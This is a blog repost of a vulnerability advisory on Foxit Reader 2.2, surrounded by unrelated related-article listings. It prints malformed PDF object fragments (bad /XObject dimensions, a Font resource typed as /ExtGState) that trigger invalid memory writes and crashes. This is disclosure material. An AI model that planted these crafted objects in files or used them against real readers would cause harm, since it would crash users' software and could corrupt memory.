Foxit Reader处理包含有畸形/XObject资源的网页时存在漏洞,用户在处理恶意文件时会导致Foxit Reader崩溃

最新推荐文章于 2021-04-03 10:21:40 发布
最新推荐文章于 2021-04-03 10:21:40 发布
阅读量1.1k 收藏
点赞数
分类专栏: ‖漏 洞 公 布‖ 文章标签: 文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackiis/article/details/2914357
版权

Foxit Reader处理包含有畸形/XObject资源的网页时存在漏洞,用户在处理恶意文件时会导致Foxit Reader崩溃

 

 

受影响系统:
Foxit Foxit Reader 2.2
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 28890

Foxit Reader是一款小型的PDF文档查看器和打印程序。

Foxit Reader处理包含有畸形/XObject资源的网页时存在漏洞,用户在处理恶意文件时会导致Foxit Reader崩溃。

当使用Foxit Reader旋转包含有畸形/XObject资源的网页时(或向页面添加了/Rotate字段):

4 0 obj

<< /Type /Page

/Parent 3 0 R

/Rotate 170

/Contents [ 25 0 R ]

/Resources <<

/ProcSet [ /PDF /Text /ImageB /ImageC ]

/XObject <</Im23 23 0 R>>/Font << /TT3 33 0 R  >>>>

>>

endobj

 

23 0 obj

<</Length 11643/Filter/DCTDecode/Width -28986631481/Height 5/BitsPerComponent 8/ColorSpace/DeviceRGB/Type/#6eject/Name/&#141;#4825#6#25n#00°#6e#6en#25n#72&Acirc;&#402;&Eacute;#25n&#8482;#r3/Subtype/Image>>

stream

........................

endstream

endobj

如果修改了宽度和高度字段,Foxit就会对各种内存地址执行无效的写访问。

在解析畸形的/ExtGState资源时也存在内存破坏漏洞。在这种情况下用/Font资源替换了ExtGState资源,但资源类型仍为ExtGState:

261 0 obj

<</Type /Page /Parent 126 0 R /MediaBox [0 0 259 408 ]/CropBox [0 0 531 666 ]/Resources <</ProcSet [/PDF /Text] /ExtGState <</R7 7 0 R>>>> /Contents [20 0 R]>>

endobj

 

7 0 obj

<</FirstChaaa 1

/Type /Funt /FontDescriptor  23 0 R

/BaseFont /xxxxxxxxxxxxxxxxoman,Italic

/Subtype /TrueType

/Encoding /WinAnsiEncoding

/LaitChar 211

/Wodths [    ]

>>

endobj

 

23 0 obj

<</zzz9&eth;E /oooooo>>

endobj

一些函数解析任何资源类型的任何字段,因此当/ExtGState资源下存在/Font字段时,仍会读取并解释这些字段,导致用错误的数据填充所分配的结构。

<*来源:Javier Vicente Vallejo
 
  链接:http://www.vallejo.cc/proyectos/foxitreader1.htm
        http://www.vallejo.cc/proyectos/foxitreader2.htm
        http://secunia.com/advisories/29934/
*>

hackiis
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PDF提取图片(错误纠正)
weixin_30929011的博客
07-29 1808
有个任务需要抽取pdf中的图片,于是找了一个例子但是有错误,仅此记录下 错误1、AttributeError: 'Document' object has no attribute 'getObjectString     解决方法:getObjectString 改成_getXrefLength 错误2、无法运行下面的程序(运行没有抽取图片)     解决方法:如果你...
Foxit Reader(福昕阅读器)(CVE-2020-14425)命令注入漏洞复现
m0_48520508的博客
04-12 942
0x00简介 Foxit Reader,是一套用来阅读PDF格式文件的软件,由福建福昕软件所研发;2009年9月3日推出3.1.1 Build 0901最新版本。Foxit Reader是一套自由使用的软件,操作系统主要以Microsoft Windows为主,且只要有Win32执行环境的操作系统上皆可使用。一个小巧的pdf文档阅读器,完全免费。有了它,你无须为仅仅阅读pdf文档而下载和安装庞大的adobe reader,而且启动快速,对中文支持非常好。 0x01漏洞概述 Foxit Reader是中国福
最好的PDF阅读器,Foxit Reader绿色V8.0
maxma的博客
04-26 348
软件不多介绍,比起Acrobat Reader实用多了。下面的版本8.0是最经典的可以关闭广告的版本,之后其他软件会提示升级到9.0,就不要升级了,因为9.0要收起那个Ribbon风格的工具栏非常麻烦,但是有没有多少实质改进。 链接: http://pan.baidu.com/s/1jHMyQd4 密码: 433g ...
提取PDF文件中图片
10-06
能提取任何PDF文件中所有JPG,BMP格式图片
扫雷英雄榜——ASP.NET常见错误及解决方案.pdf
01-15
ASP.NET常见错误及解决方案ASP.NE
FoxitReader_AX_Pro.zip
07-09
这个名字暗示了它包含的是FoxitReader的ActiveX(AX)专业版,即一个专为开发人员设计的API,允许在Delphi这样的集成开发环境中嵌入PDF阅读和处理功能。FoxitReader AX Pro提供了丰富的接口和全面的文档,使得开发者...
Foxit Reader.rar
04-05
这款软件的主要特点是它的小巧体积,只有2.55兆的下载文件大小,这意味着它在安装和运行不会占用大量的硬盘空间,对于那些对存储空间有限制的用户来说,是一个理想的选择。 首先,作为一款PDF阅读器,Foxit ...
FoxitReader_for_linux.bz2
06-22
FoxitReader v2.4.4.0911_x64 for linux.
Foxit Reader PDF Printer Driver
07-23
使用福昕阅读器PDF打印机,用户只需在需要打印的文件中选择“打印”选项,然后选择“Foxit Reader PDF Printer”作为目的地。这样,文件会被转换为一个PDF文档,保留所有的图像、文本和排版细节。这对于共享、存档或...
FoxitReader.enu.setup.2.4.4.0911.x64.run.tar.gz
12-28
福昕PDF阅读器是一款全球知名的PDF文档处理工具,其Linux版本——"FoxitReader.enu.setup.2.4.4.0911.x64.run",是专为Linux操作系统设计的PDF阅读和处理软件。这个软件版本号为2.4.4,发布日期可能为2009年11月,它...
只要三步就能找回被删除并清空的文件 .txt
09-21
只要三步就能找回被删除并清空的文件,更容易让你找回丢失的文件
Foxit Reader3
04-03
Foxit Reader3 轻量级pdf浏览器 比其他软件打开速度都快
Foxit_Reader完美绿色加强版
07-06
Foxit_Reader完美绿色加强版
有问题的文件传输代码
11-20
三个问题等待高手解答 问题见此网址 http://topic.csdn.net/u/20091120/01/320edd29-08e4-4c9e-aa5d-0d6e6f23104e.html
foxit reader 3.1 绿色中文破解版
02-03
Foxit Reader 3.1 最新版本,找了好久才找到,解压后体积约为10M。 主要特点: 无需安装,解压后可直接使用。 可以实现去除水印、对文档添加注释、划线等众多高级功能。 其它不多介绍,希望能对您有用!
java 线程 资源_Java多线程下解决资源竞争的7种方法详解
weixin_39635459的博客
02-12 212
前言一般情况下,只要涉及到多线程编程,程序的复杂性就会显著上升,性能显著下降,BUG出现的概率大大提升。多线程编程本意是将一段程序并行运行,提升数据处理能力,但是由于大部分情况下都涉及到共有资源的竞争,所以修改资源对象必须加锁处理。但是锁的实现有很多种方法,下面就来一起了解一下在C#语言中几种锁的实现与其性能表现。一、c#下的几种锁的运用方式1、临界区,通过对多线程的串行化来访问公共资源或一段代...
Unity-工具-查找丢失资源Objects
祝你万事顺利的博客
07-13 786
Resources.FindObjectsOfTypeAll This function can return any type of Unity object that is loaded, including game objects, prefabs, materials, meshes, textures, etc. It will also ...
oracle blob csv,将blob数据转换为CSV-fi
weixin_36021461的博客
04-03 375
我正在尝试使用python将blob数据从mssql转换为csv文件。Blob数据本身有许多其他逗号,这使我无法正确地转换它。在有没有一种方法可以在blob中转义逗号,但在需要将其正确地上传到另一个db。在我正在为一个GAE项目做这件事,并从mssqldb下载表来上传GAE数据存储。既然我也应该开始使用xml吗?在--更新--保存pdf文件的已转换sql行如下所示:ObjectID,FileDa...
foxit reader
最新发布
08-13
Foxit Reader是一款功能强大的免费PDF阅读器。它具有一系列先进的功能使得阅读和管理PDF文件变得更加简便和高效。 首先,Foxit Reader提供了快速、流畅的PDF阅读体验。它可以快速打开和加载PDF文件,而且具有流畅的滚动和缩放功能。用户可以轻松地浏览长篇文档,并可以根据需要进行放大或缩小页面,以便更好地查看细节。 其次,Foxit Reader具有注释和标记功能。用户可以在PDF文档上进行高亮、划线、笔记和批注等操作,从而更好地标记重要信息或与他人进行协作。此外,它还支持添加书签和目录,帮助用户快速定位和跳转至所需的内容位置。 另外,Foxit Reader还提供了丰富的PDF文档管理功能。用户可以进行文件的复制、剪切、粘贴和删除等操作,使得 PDF 文件的管理变得非常方便。它还支持将PDF文件转换为其他格式,比如Word或Excel,以便在编辑和修改更加灵活和方便。 此外,Foxit Reader具有安全和隐私保护功能。它支持通过加密和密码保护来保障PDF文件的安全性。用户还可以设置权限和限制访问内容,以便确保敏感信息不被未经授权的人员访问。 总之,Foxit Reader是一款功能丰富、易用且免费的PDF阅读器。它提供了优秀的阅读体验和PDF文档管理功能,帮助用户更高效地处理和管理PDF文件。无论是用于学习、工作还是娱乐,Foxit Reader都是一个绝佳的选择。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值